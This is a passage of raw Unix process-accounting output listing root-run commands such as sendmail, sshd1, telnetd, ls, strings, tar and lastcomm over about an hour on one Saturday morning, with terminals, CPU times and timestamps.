10:25 1352 ls S root ttyp1 0.05 secs Sat Jun 3 10:26 1348 file S root ttyp1 0.02 secs Sat Jun 3 10:26 1346 sshd1 SF root __ 0.47 secs Sat Jun 3 09:52 1345 less S root ttyp1 0.03 secs Sat Jun 3 10:26 1325 sshd1 SF root __ 0.01 secs Sat Jun 3 10:26 1321 sendmail SF root __ 0.06 secs Sat Jun 3 10:26 1314 sendmail SF root __ 0.06 secs Sat Jun 3 10:27 1285 cat S root __ 0.01 secs Sat Jun 3 10:27 1278 sendmail SF root __ 0.01 secs Sat Jun 3 10:27 1277 sendmail S root __ 0.23 secs Sat Jun 3 10:27 1276 sh S root __ 0.01 secs Sat Jun 3 10:27 1275 sendmail SF root __ 0.02 secs Sat Jun 3 10:27 1250 sendmail SF root __ 0.08 secs Sat Jun 3 10:27 1248 sendmail SF root __ 0.08 secs Sat Jun 3 10:27 1247 sendmail SF root __ 0.05 secs Sat Jun 3 10:27 1234 sendmail SF root __ 0.03 secs Sat Jun 3 10:26 1224 sendmail SF root __ 0.08 secs Sat Jun 3 10:28 1220 sendmail SF root __ 0.08 secs Sat Jun 3 10:28 1219 sendmail SF root __ 0.03 secs Sat Jun 3 10:28 1212 sendmail SF root __ 0.05 secs Sat Jun 3 10:28 1209 sendmail SF root __ 0.03 secs Sat Jun 3 10:27 1208 sendmail SF root __ 0.08 secs Sat Jun 3 10:28 1202 sshd1 SF root __ 1.06 secs Sat Jun 3 10:27 1157 sendmail SF root __ 0.05 secs Sat Jun 3 10:26 1122 sendmail SF root __ 0.05 secs Sat Jun 3 10:30 1117 sendmail SF root __ 0.06 secs Sat Jun 3 10:30 1115 sendmail SF root __ 0.06 secs Sat Jun 3 10:30 1088 ls S root ttyp4 0.08 secs Sat Jun 3 10:31 1084 f S root ttyp4 0.11 secs Sat Jun 3 10:31 1083 ls S root ttyp4 0.01 secs Sat Jun 3 10:31 1080 ls S root ttyp4 0.03 secs Sat Jun 3 10:31 1075 date S root ttyp4 0.01 secs Sat Jun 3 10:31 1072 telnetd S root __ 0.17 secs Sat Jun 3 10:29 1067 ls S root ttyp4 0.01 secs Sat Jun 3 10:31 1062 ls S root ttyp4 0.01 secs Sat Jun 3 10:32 1061 ls S root ttyp4 0.01 secs Sat Jun 3 10:32 1060 ls S root ttyp4 0.02 secs Sat Jun 3 10:32 1052 cat S root __ 0.01 secs Sat Jun 3 10:32 1046 sendmail SF root __ 0.01 secs Sat Jun 3 10:32 1045 sendmail S root __ 0.23 secs Sat Jun 3 10:32 1044 sh S root __ 0.01 secs Sat Jun 3 10:32 1043 sendmail SF root __ 0.01 secs Sat Jun 3 10:32 1040 proftpd S root __ 1.05 secs Sat Jun 3 10:15 1036 less S root ttyp4 0.03 secs Sat Jun 3 10:32 1030 ls S root ttyp4 0.01 secs Sat Jun 3 10:33 1029 ls S root ttyp4 0.01 secs Sat Jun 3 10:33 1028 ls S root ttyp4 0.02 secs Sat Jun 3 10:33 1022 file S root ttyp4 0.02 secs Sat Jun 3 10:33 1021 sendmail SF root __ 0.06 secs Sat Jun 3 10:33 1020 sendmail SF root __ 0.03 secs Sat Jun 3 10:32 1018 less S root ttyp4 0.03 secs Sat Jun 3 10:33 1016 sendmail SF root __ 0.06 secs Sat Jun 3 10:33 1013 less S root ttyp4 0.53 secs Sat Jun 3 10:33 1010 ls S root ttyp4 0.01 secs Sat Jun 3 10:33 1000 ls S root ttyp4 0.03 secs Sat Jun 3 10:33 999 strings S root ttyp4 0.05 secs Sat Jun 3 10:33 998 strings S root ttyp4 0.05 secs Sat Jun 3 10:33 997 strings S root ttyp4 0.02 secs Sat Jun 3 10:34 996 less S root ttyp4 0.05 secs Sat Jun 3 10:34 995 ls S root ttyp4 0.01 secs Sat Jun 3 10:34 992 strings S root ttyp4 0.01 secs Sat Jun 3 10:34 978 sendmail SF root __ 0.01 secs Sat Jun 3 10:34 977 sendmail SF root __ 0.06 secs Sat Jun 3 10:34 976 sendmail SF root __ 0.03 secs Sat Jun 3 10:34 974 sendmail SF root __ 0.03 secs Sat Jun 3 10:34 973 less S root ttyp4 0.05 secs Sat Jun 3 10:34 972 ls S root ttyp4 0.01 secs Sat Jun 3 10:34 971 ls S root ttyp4 0.01 secs Sat Jun 3 10:34 970 ls S root ttyp4 0.02 secs Sat Jun 3 10:34 952 ls S root ttyp4 0.01 secs Sat Jun 3 10:35 945 ls S root ttyp4 0.02 secs Sat Jun 3 10:35 944 ls S root ttyp4 0.01 secs Sat Jun 3 10:35 943 ls S root ttyp4 0.01 secs Sat Jun 3 10:35 936 find S root ttyp1 64.88 secs Sat Jun 3 10:26 935 tee S root ttyp1 0.01 secs Sat Jun 3 10:26 934 ls S root ttyp4 0.02 secs Sat Jun 3 10:36 933 ls S root ttyp4 0.01 secs Sat Jun 3 10:36 932 ls S root ttyp4 0.02 secs Sat Jun 3 10:36 931 df S root ttyp4 0.11 secs Sat Jun 3 10:36 927 sendmail SF root __ 0.05 secs Sat Jun 3 10:36 925 sendmail SF root __ 0.06 secs Sat Jun 3 10:36 924 sendmail SF root __ 0.05 secs Sat Jun 3 10:36 915 less S root ttyp4 0.06 secs Sat Jun 3 10:36 914 ls S root ttyp4 0.08 secs Sat Jun 3 10:36 913 lpq S root ttyp4 0.02 secs Sat Jun 3 10:36 887 cat S root __ 0.01 secs Sat Jun 3 10:37 886 sendmail SF root __ 0.01 secs Sat Jun 3 10:37 885 sendmail S root __ 0.22 secs Sat Jun 3 10:37 884 sh S root __ 0.01 secs Sat Jun 3 10:37 883 sendmail SF root __ 0.01 secs Sat Jun 3 10:37 880 pico S root ttyp0 0.05 secs Sat Jun 3 10:21 878 ls S root ttyp0 0.02 secs Sat Jun 3 10:37 877 tail S root ttyp0 0.01 secs Sat Jun 3 10:37 876 lpr S root ttyp0 0.02 secs Sat Jun 3 10:37 875 lpd SF root __ 0.02 secs Sat Jun 3 10:37 874 sendmail SF root __ 0.06 secs Sat Jun 3 10:37 872 sendmail SF root __ 0.08 secs Sat Jun 3 10:38 871 sendmail SF root __ 0.03 secs Sat Jun 3 10:37 868 proftpd S root __ 0.28 secs Sat Jun 3 10:37 861 pico S root ttyp0 0.02 secs Sat Jun 3 10:38 849 sshd1 SF root __ 0.16 secs Sat Jun 3 10:38 810 sendmail SF root __ 0.05 secs Sat Jun 3 10:39 808 sendmail SF root __ 0.05 secs Sat Jun 3 10:40 805 scp1 S root ttyp0 0.03 secs Sat Jun 3 10:40 804 ssh1 S root ttyp0 0.09 secs Sat Jun 3 10:40 755 sendmail SF root __ 0.06 secs Sat Jun 3 10:40 750 sendmail SF root __ 0.11 secs Sat Jun 3 10:40 738 sendmail SF root __ 0.06 secs Sat Jun 3 10:40 735 sendmail SF root __ 0.09 secs Sat Jun 3 10:40 731 sshd1 SF root __ 0.50 secs Sat Jun 3 10:39 714 telnetd S root __ 0.20 secs Sat Jun 3 10:37 710 sendmail SF root __ 0.08 secs Sat Jun 3 10:40 708 sendmail SF root __ 0.11 secs Sat Jun 3 10:41 701 sendmail SF root __ 0.05 secs Sat Jun 3 10:40 695 sendmail SF root __ 0.03 secs Sat Jun 3 10:41 693 sendmail SF root __ 0.05 secs Sat Jun 3 10:41 692 sendmail SF root __ 0.02 secs Sat Jun 3 10:40 688 sendmail SF root __ 0.03 secs Sat Jun 3 10:41 687 sendmail SF root __ 0.02 secs Sat Jun 3 10:41 685 sendmail SF root __ 0.05 secs Sat Jun 3 10:41 662 cat S root __ 0.01 secs Sat Jun 3 10:42 661 sendmail SF root __ 0.01 secs Sat Jun 3 10:42 660 sendmail S root __ 0.20 secs Sat Jun 3 10:42 659 sh S root __ 0.01 secs Sat Jun 3 10:42 658 sendmail SF root __ 0.01 secs Sat Jun 3 10:42 645 telnetd S root __ 0.09 secs Sat Jun 3 10:41 644 sendmail SF root __ 0.03 secs Sat Jun 3 10:42 643 sendmail SF root __ 0.03 secs Sat Jun 3 10:42 642 procmail S root __ 0.09 secs Sat Jun 3 10:42 640 sendmail SF root __ 0.03 secs Sat Jun 3 10:42 639 sendmail SF root __ 0.03 secs Sat Jun 3 10:41 628 sendmail SF root __ 0.05 secs Sat Jun 3 10:43 627 sendmail SF root __ 0.03 secs Sat Jun 3 10:43 625 sendmail SF root __ 0.06 secs Sat Jun 3 10:43 619 sendmail SF root __ 0.02 secs Sat Jun 3 10:39 583 sendmail SF root __ 0.05 secs Sat Jun 3 10:45 578 sendmail SF root __ 0.06 secs Sat Jun 3 10:45 577 sendmail SF root __ 0.03 secs Sat Jun 3 10:45 561 bash SF root ttyp0 0.01 secs Sat Jun 3 10:46 557 w S root ttyp0 0.05 secs Sat Jun 3 10:46 509 cat S root __ 0.01 secs Sat Jun 3 10:47 506 sendmail SF root __ 0.01 secs Sat Jun 3 10:47 505 sendmail S root __ 0.20 secs Sat Jun 3 10:47 504 sh S root __ 0.01 secs Sat Jun 3 10:47 503 sendmail SF root __ 0.02 secs Sat Jun 3 10:47 497 sshd1 SF root __ 0.28 secs Sat Jun 3 10:47 474 proftpd S root __ 0.73 secs Sat Jun 3 10:44 460 sendmail SF root __ 0.03 secs Sat Jun 3 10:48 439 sshd1 SF root __ 0.16 secs Sat Jun 3 10:48 424 sshd1 SF root __ 0.31 secs Sat Jun 3 10:47 415 sshd1 SF root __ 0.23 secs Sat Jun 3 10:49 413 tcpd S root __ 0.02 secs Sat Jun 3 10:49 412 sendmail SF root __ 0.05 secs Sat Jun 3 10:49 409 sendmail SF root __ 0.05 secs Sat Jun 3 10:49 408 sendmail SF root __ 0.03 secs Sat Jun 3 10:49 393 tcpd S root __ 0.03 secs Sat Jun 3 10:49 352 sendmail SF root __ 0.06 secs Sat Jun 3 10:51 350 sendmail SF root __ 0.08 secs Sat Jun 3 10:51 341 sendmail SF root __ 0.02 secs Sat Jun 3 10:51 330 cat S root __ 0.01 secs Sat Jun 3 10:52 329 sendmail SF root __ 0.01 secs Sat Jun 3 10:52 328 sendmail S root __ 0.20 secs Sat Jun 3 10:52 327 sh S root __ 0.01 secs Sat Jun 3 10:52 326 sendmail SF root __ 0.02 secs Sat Jun 3 10:52 315 sendmail SF root __ 0.01 secs Sat Jun 3 10:53 314 sendmail SF root __ 0.03 secs Sat Jun 3 10:53 313 sendmail SF root __ 0.02 secs Sat Jun 3 10:53 310 sendmail SF root __ 0.03 secs Sat Jun 3 10:53 309 ls S root ttyp1 0.01 secs Sat Jun 3 10:53 308 ls S root ttyp1 0.01 secs Sat Jun 3 10:53 277 file S root ttyp1 0.01 secs Sat Jun 3 10:53 276 strings S root ttyp1 0.44 secs Sat Jun 3 10:53 274 ls S root ttyp1 0.01 secs Sat Jun 3 10:53 273 strings S root ttyp1 0.02 secs Sat Jun 3 10:53 271 ls S root ttyp1 0.01 secs Sat Jun 3 10:54 270 strings S root ttyp1 0.03 secs Sat Jun 3 10:54 261 strings S root ttyp1 0.02 secs Sat Jun 3 10:54 260 less S root ttyp1 0.03 secs Sat Jun 3 10:54 259 ls S root ttyp1 0.01 secs Sat Jun 3 10:54 258 ls S root ttyp1 0.01 secs Sat Jun 3 10:54 235 tar S root ttyp1 0.02 secs Sat Jun 3 10:55 234 reset S root ttyp1 0.03 secs Sat Jun 3 10:55 230 bash S root ttyp1 2.95 secs Sat Jun 3 09:47 226 sh S root ttyp1 0.08 secs Sat Jun 3 09:47 224 sshd1 SF root __ 4.89 secs Sat Jun 3 09:46 223 ls S root ttyp0 0.02 secs Sat Jun 3 10:55 185 sshd1 SF root __ 0.30 secs Sat Jun 3 10:53 184 ls S root ttyp1 0.01 secs Sat Jun 3 10:55 179 tar S root ttyp1 0.03 secs Sat Jun 3 10:56 175 ls S root ttyp1 0.01 secs Sat Jun 3 10:56 168 f S root ttyp1 0.06 secs Sat Jun 3 10:56 161 f S root ttyp1 0.06 secs Sat Jun 3 10:56 160 f S root ttyp1 0.08 secs Sat Jun 3 10:56 159 f S root ttyp1 0.08 secs Sat Jun 3 10:57 153 ls S root ttyp1 0.01 secs Sat Jun 3 10:57 152 ls S root ttyp1 0.03 secs Sat Jun 3 10:57 151 ls S root ttyp1 0.01 secs Sat Jun 3 10:57 150 ls S root ttyp1 0.01 secs Sat Jun 3 10:57 132 cat S root __ 0.01 secs Sat Jun 3 10:57 129 sendmail SF root __ 0.01 secs Sat Jun 3 10:57 128 sendmail S root __ 0.20 secs Sat Jun 3 10:57 127 sh S root __ 0.01 secs Sat Jun 3 10:57 126 sendmail SF root __ 0.02 secs Sat Jun 3 10:57 117 ls S root ttyp1 0.01 secs Sat Jun 3 10:57 116 ls S root ttyp1 0.01 secs Sat Jun 3 10:57 115 ls S root ttyp1 0.08 secs Sat Jun 3 10:57 114 ls S root ttyp1 0.01 secs Sat Jun 3 10:57 113 mv S root ttyp1 0.01 secs Sat Jun 3 10:57 112 ls S root ttyp1 0.01 secs Sat Jun 3 10:57 107 sendmail SF root __ 0.02 secs Sat Jun 3 10:56 102 lastcomm S root ttyp1 13.11 secs Sat Jun 3 10:58 101 ls S root ttyp1 0.02 secs Sat Jun 3 10:58 93 less S root ttyp1 0.12 secs Sat Jun 3 10:58 92 ls S root ttyp1 0.01 secs Sat Jun 3 10:58 91 sendmail SF root __ 0.05 secs Sat Jun 3 10:58 89 sendmail SF root __ 0.06 secs Sat Jun 3 10:58 88 sendmail SF root __ 0.03 secs Sat Jun 3 10:57 86 sendmail SF root __ 0.02 secs Sat Jun 3 10:58 77 tee S root ttyp1 0.01 secs Sat Jun 3 10:58 76 lastcomm S root ttyp1 12.83 secs Sat Jun 3 10:58 74 ls S root ttyp1 0.01 secs Sat Jun 3 10:59 56 proftpd S root __ 1.19 secs Sat Jun 3 10:35 55 tee S root ttyp1 0.01 secs Sat Jun 3 10:59 54 lastcomm S root ttyp1 13.11 secs Sat Jun 3 10:59 48 ls S root ttyp1 0.01 secs Sat Jun 3 10:59 44 ls S root ttyp1 0.02 secs Sat Jun 3 10:59 42 sendmail SF root __ 0.03 secs Sat Jun 3 10:59 41 sendmail SF root __ 0.03 secs Sat Jun 3 10:59 39 sendmail SF root __ 0.05 secs Sat Jun 3 10:59 38 mv S root ttyp1 0.01 secs Sat Jun 3 10:59 37 pico S root ttyp0 0.05 secs Sat Jun 3 10:59 36 mv S root ttyp1 0.01 secs Sat Jun 3 10:59 35 bash SF root ttyp1 0.01 secs Sat Jun 3 10:59 34 pico S root ttyp0 0.03 secs Sat Jun 3 10:59 18 pico S root ttyp0 0.03 secs Sat Jun 3 11:00 7 less S root ttyp1 0.03 secs Sat Jun 3 11:00 3 lastcomm S root ttyp1 0.64 secs Sat Jun 3 11:00 2 bash S root ttyp1 0.01 secs Sat Jun 3 11:00 1 lastcomm S root ttyp1 0.14 secs Sat Jun 3 11:00